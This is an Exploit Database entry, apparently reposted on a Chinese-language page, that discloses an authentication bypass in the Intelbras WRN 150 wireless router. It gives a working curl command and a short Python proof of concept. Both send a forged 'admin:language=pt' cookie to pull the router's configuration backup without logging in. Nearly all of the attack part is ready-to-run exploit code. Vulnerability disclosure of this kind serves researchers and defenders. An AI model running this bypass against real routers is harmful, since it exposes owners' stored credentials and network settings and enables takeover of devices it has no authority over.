Roteador Wireless Intelbras WRN150 – Autentication Bypass

• Exploit Database
• 16 阅读

• 作者： Elber Tavares
  日期： 2017-09-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/42916/

• # Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
  150
  # Date: 28/09/2017
  # Exploit Author: Elber Tavares
  # Vendor Homepage: http://intelbras.com.br/
  # Version: Intelbras Wireless N 150 Mbps - WRN 150
  # Tested on: kali linux, windows 7, 8.1, 10
  For more info:
  
  http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
  
  URL VULN: http://10.0.0.1/
  
  Download backup file:
  
  Payload: curl --cookie "Cookie=admin:language=pt"
  http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
  
  
  
  PoC:
  
  #pip install requests
  from requests import get
  
  url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
  #url do backup
  header = {'Cookie': 'admin:language=pt'}
  #setando o cookie no header
  r = get(url, headers=header).text
  print(r)